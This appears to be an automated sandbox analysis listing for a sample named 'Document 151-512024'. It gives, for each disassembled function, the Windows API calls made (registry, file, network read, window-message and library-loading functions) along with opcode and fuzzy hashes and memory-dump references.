Instruction ID: 11a7db507d1b4370dd5b282cdb192c7ac3bff5014a8f96f1d3ebb407992e6abb
Opcode Fuzzy Hash: 423076d617df01a9100b75550c4d54cf41f38175f80d47c9b5372f70627f1de4
Instruction Fuzzy Hash: 52A1BFB1A043019FD720DF24C886F2AB7E5AF84714F14895DF99A9B392D7B0EC45CB92

Function 0097BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,009E3700), ref: 0097BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,00A1121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0097BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00A11270,000000FF,?,0000003F,00000000,?), ref: 0097BC36
_free.LIBCMT ref: 0097BB7F

Part of subcall function 009729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000), ref: 009729DE
Part of subcall function 009729C8: GetLastError.KERNEL32(00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000,00000000), ref: 009729F0

_free.LIBCMT ref: 0097BD4B

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 76666acb215eceb7829208de76bfdd8360c5365a91d2e3f910f5461db06aa2f8
Instruction ID: 13a30b13830e86e87e9e70b91288dae11f7dfd822ec85f0d9039adda1240ad59
Opcode Fuzzy Hash: 76666acb215eceb7829208de76bfdd8360c5365a91d2e3f910f5461db06aa2f8
Instruction Fuzzy Hash: 7851B773904209AFCB11EFA99C81BEEB7BCEF81350B14C66AE558D7191EB705D418B50

Function 009AE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 009ADDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009ACF22,?), ref: 009ADDFD

Part of subcall function 009ADDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009ACF22,?), ref: 009ADE16

Part of subcall function 009AE199: GetFileAttributesW.KERNEL32(?,009ACF95), ref: 009AE19A

lstrcmpiW.KERNEL32(?,?), ref: 009AE473
MoveFileW.KERNEL32(?,?), ref: 009AE4AC
_wcslen.LIBCMT ref: 009AE5EB
_wcslen.LIBCMT ref: 009AE603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 009AE650

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 302e138dc43a8bd54d6fec28596098299b0de0fe1183889f3645e6d0de364fd4
Instruction ID: 69664d0eb75a63a5f34c811db7d2481cad658c80b33fbf3c9704bbd33686c33c
Opcode Fuzzy Hash: 302e138dc43a8bd54d6fec28596098299b0de0fe1183889f3645e6d0de364fd4
Instruction Fuzzy Hash: 545153B24083455BC724DB94DC85ADBB3ECAFC5344F00491EF589D3191EF74A688C7A6

Function 009CB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD

Part of subcall function 009CC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009CB6AE,?,?), ref: 009CC9B5
Part of subcall function 009CC998: _wcslen.LIBCMT ref: 009CC9F1
Part of subcall function 009CC998: _wcslen.LIBCMT ref: 009CCA68
Part of subcall function 009CC998: _wcslen.LIBCMT ref: 009CCA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009CBAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009CBB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 009CBB63
RegCloseKey.ADVAPI32(?,?), ref: 009CBBA6
RegCloseKey.ADVAPI32(00000000), ref: 009CBBB3

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 00fefee292b5ed54d0b55581a62b644efffad4f78750b3f4187fc77e010ea450
Instruction ID: 8d1982e2ca3d517bf4a187e8ef2647e7178f44607ec959fbe68b574baa40c3a0
Opcode Fuzzy Hash: 00fefee292b5ed54d0b55581a62b644efffad4f78750b3f4187fc77e010ea450
Instruction Fuzzy Hash: C361AF71608241AFD714DF24C491F2ABBE9FF84348F14895DF49A8B2A2DB31ED45CB92

Function 009A8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009A8BCD
VariantClear.OLEAUT32 ref: 009A8C3E
VariantClear.OLEAUT32 ref: 009A8C9D
VariantClear.OLEAUT32(?), ref: 009A8D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 009A8D3B

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 6ae1cc90387d6085437c272f7c4d1db1600335298f9458f77d555bc35d4c3eab
Instruction ID: c49976944752f9cc8253c37e8c0485dcb2bda1a06c57e9f1329b73ab88880789
Opcode Fuzzy Hash: 6ae1cc90387d6085437c272f7c4d1db1600335298f9458f77d555bc35d4c3eab
Instruction Fuzzy Hash: EC516BB5A1021AEFCB14CF68C894AAAB7F9FF89310B158559F909DB350E734E911CF90

Function 009B8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009B8BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 009B8BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 009B8C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 009B8C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 009B8C5F

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 5d10850768d05d1e552344bbf6b7bb0316b3614755b25f7cebf443a6494c5870
Instruction ID: 21ac32e29e78231b7ea14452f8a5820b7fe70ba0ea40bbbd319c1601e25e6fe7
Opcode Fuzzy Hash: 5d10850768d05d1e552344bbf6b7bb0316b3614755b25f7cebf443a6494c5870
Instruction Fuzzy Hash: 14515C75A002199FCB00DF64C881EAEBBF5FF48314F088459E949AB362CB35ED41CB90

Function 009C8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 009C8F40
GetProcAddress.KERNEL32(00000000,?), ref: 009C8FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 009C8FEC
GetProcAddress.KERNEL32(00000000,?), ref: 009C9032
FreeLibrary.KERNEL32(00000000), ref: 009C9052

Part of subcall function 0095F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,009B1043,?,761DE610), ref: 0095F6E6
Part of subcall function 0095F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0099FA64,00000000,00000000,?,?,009B1043,?,761DE610,?,0099FA64), ref: 0095F70D

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: f93d8462571cea77b072e35e551728114e5318488db619ee6da2ecc9919ce890
Instruction ID: 0311a49f0d2ec70c3c946aa351a5410a2d1f6590e14f4a86a2714ffbf7e8635c
Opcode Fuzzy Hash: f93d8462571cea77b072e35e551728114e5318488db619ee6da2ecc9919ce890
Instruction Fuzzy Hash: 85512A35A05205DFC711DF58C494EAEBBF5FF49314B0480A9E80AAB362DB31ED86CB91

Function 00972051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 009720C3
_free.LIBCMT ref: 009720E3

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 18906cc37655792565ed15d364ebb2e4e723c862cdf4d56fc76c155577e5f34f
Instruction ID: 5c5926b23ed1b573f277528b3d6b528ba8e8de1f2d90aabd7450a8c639f59c2a
Opcode Fuzzy Hash: 18906cc37655792565ed15d364ebb2e4e723c862cdf4d56fc76c155577e5f34f
Instruction Fuzzy Hash: 3541D233A102049FCB24DFB8C881A5DB7F5EF89324F558568EA19EB351D631AD01CB90

Function 009B3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 009B38CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 009B3922
TranslateMessage.USER32(?), ref: 009B394B
DispatchMessageW.USER32(?), ref: 009B3955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009B3966

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 54deffc1cbb9eeedc42c6613e9ce17c6aa8acde13aa78e5d3a34b78a7587eeed
Instruction ID: 74d0e7cb1e8f8158ec9aaf70c3ed579cb92bff0f71f0fa29613da632b648efc4
Opcode Fuzzy Hash: 54deffc1cbb9eeedc42c6613e9ce17c6aa8acde13aa78e5d3a34b78a7587eeed
Instruction Fuzzy Hash: 4A31E970508342EFEB35CB75DE48BF637ACAB05320F44C56DE562C60A0E7B4A685CB11

Function 009BCF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 009BCF38
InternetReadFile.WININET(?,00000000,?,?), ref: 009BCF6F
GetLastError.KERNEL32(?,00000000,?,?,?,009BC21E,00000000), ref: 009BCFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,009BC21E,00000000), ref: 009BCFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,009BC21E,00000000), ref: 009BCFF2

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 0c97eb2827845bd7190a870da7bdadc071356165583d7e21a9b392cd98d22ddb
Instruction ID: e5d8f5f2939de42e100e3c00a156604e2f756081c99d532148dac4a93195f51d
Opcode Fuzzy Hash: 0c97eb2827845bd7190a870da7bdadc071356165583d7e21a9b392cd98d22ddb
Instruction Fuzzy Hash: 5E315EB1604206EFDB20DFA5CA84ABBBBFDEB14361B10446EF516D2140DB30EE44DB60

Function 009A1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 009A1915
PostMessageW.USER32(00000001,00000201,00000001), ref: 009A19C1
Sleep.KERNEL32(00000000,?,?,?), ref: 009A19C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 009A19DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 009A19E2

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 14e7cd8d128e85c792e690478fa4314a65e565bd48a1f4b38df309b5effebf49
Instruction ID: eea87c2b003c8bb9942cd18bebf96452a05b9474b5c98344d05389203a04c1c9
Opcode Fuzzy Hash: 14e7cd8d128e85c792e690478fa4314a65e565bd48a1f4b38df309b5effebf49
Instruction Fuzzy Hash: 1331C071A0421AEFCB00CFA8DD99ADF3BB9EB85315F104229F921AB2D1C7709944DB90

Function 009D5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 009D5745
SendMessageW.USER32(?,00001074,?,00000001), ref: 009D579D
_wcslen.LIBCMT ref: 009D57AF
_wcslen.LIBCMT ref: 009D57BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 009D5816

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: f519acd691b41457ca949c0f98f386a5b57e74f0710844dcfb2e11fef585f65f
Instruction ID: a07d185bbd82040062ab13b221c062e9ab18012adec74be63dafa17d1e758de8
Opcode Fuzzy Hash: f519acd691b41457ca949c0f98f386a5b57e74f0710844dcfb2e11fef585f65f
Instruction Fuzzy Hash: 2921A071944618EADB209FA5CC84AEEBBBCFF44760F10C617E929EB294D7708985CF50

Function 009C0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 009C0951
GetForegroundWindow.USER32 ref: 009C0968
GetDC.USER32(00000000), ref: 009C09A4
GetPixel.GDI32(00000000,?,00000003), ref: 009C09B0
ReleaseDC.USER32(00000000,00000003), ref: 009C09E8

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: a0aaac2870f0b5cee5ca42f5a917be6def79e7620c8deafd284b2add1a40e260
Instruction ID: c988b40fa346c57b487ea46c41a1ed6ef35b6dca8d4758973a475a28fa187f76
Opcode Fuzzy Hash: a0aaac2870f0b5cee5ca42f5a917be6def79e7620c8deafd284b2add1a40e260
Instruction Fuzzy Hash: F0215B75A04215AFD704EF65C988FAEBBE9EF88750F048469F84A97362CA30EC44DB50

Function 0097CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0097CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0097CDE9

Part of subcall function 00973820: RtlAllocateHeap.NTDLL(00000000,?,00A11444,?,0095FDF5,?,?,0094A976,00000010,00A11440,009413FC,?,009413C6,?,00941129), ref: 00973852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0097CE0F
_free.LIBCMT ref: 0097CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0097CE31

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 1beae59ca33aa2aa67664c25573acdcfd6d22eeac2ea3fa420f4cdac6cccd973
Instruction ID: 14c3ba374c8ec36ca258377ce4f96490534e7bb55af0a10b5e508f8c9f081108
Opcode Fuzzy Hash: 1beae59ca33aa2aa67664c25573acdcfd6d22eeac2ea3fa420f4cdac6cccd973
Instruction Fuzzy Hash: CD0184F36066157F272116BA6C88D7BAA6DDFC6BA1315812EF909D7201EA618D0291B0

Function 00959639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00959693
SelectObject.GDI32(?,00000000), ref: 009596A2
BeginPath.GDI32(?), ref: 009596B9
SelectObject.GDI32(?,00000000), ref: 009596E2

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: fc4604d0c9f75693a2ff75911fcc9cbba8af8c2d3fcf72a8f1da1a13d6c88296
Instruction ID: c2b50de561638af68ff8dadc2a19800c199d8ee1de71577e3fd30f12f853f5cd
Opcode Fuzzy Hash: fc4604d0c9f75693a2ff75911fcc9cbba8af8c2d3fcf72a8f1da1a13d6c88296
Instruction Fuzzy Hash: A5219270817306EFEF11DFA5EC197E97BA9BB40316F108216F960A61B0D374589ADF90

Function 009A5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 009A5726
_memcmp.LIBVCRUNTIME ref: 009A5744
_memcmp.LIBVCRUNTIME ref: 009A5757
_memcmp.LIBVCRUNTIME ref: 009A576F
_memcmp.LIBVCRUNTIME ref: 009A5787

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 265039a73f733815e84dfe6925487f9f6b7d62018da8e4fe4997832a36fa77fa
Instruction ID: b66b3a0e27b55227879e4fdf0cdf05b1a65206482938423a5e6895c8c98ebd4d
Opcode Fuzzy Hash: 265039a73f733815e84dfe6925487f9f6b7d62018da8e4fe4997832a36fa77fa
Instruction Fuzzy Hash: B901DD61781A15FBD21855109D53FBB735C9FA23A8F068421FD1ABF741F764EE1082E0

Function 00972DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0096F2DE,00973863,00A11444,?,0095FDF5,?,?,0094A976,00000010,00A11440,009413FC,?,009413C6), ref: 00972DFD
_free.LIBCMT ref: 00972E32
_free.LIBCMT ref: 00972E59
SetLastError.KERNEL32(00000000,00941129), ref: 00972E66
SetLastError.KERNEL32(00000000,00941129), ref: 00972E6F

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 40b1bd123befda532ed2145c107b6fa9861c2bec1870d7d0125154f13d5ccef8
Instruction ID: 69b33f08bd61e9b3b340abd0d901127fe6d31b1c9fcdd04fa786e8b80f5b2962
Opcode Fuzzy Hash: 40b1bd123befda532ed2145c107b6fa9861c2bec1870d7d0125154f13d5ccef8
Instruction Fuzzy Hash: 45012877265601B7C61367746C45E2B275DAFC53B1B25C539F82DA32D3EF748C825020

Function 009A000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0099FF41,80070057,?,?,?,009A035E), ref: 009A002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0099FF41,80070057,?,?), ref: 009A0046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0099FF41,80070057,?,?), ref: 009A0054
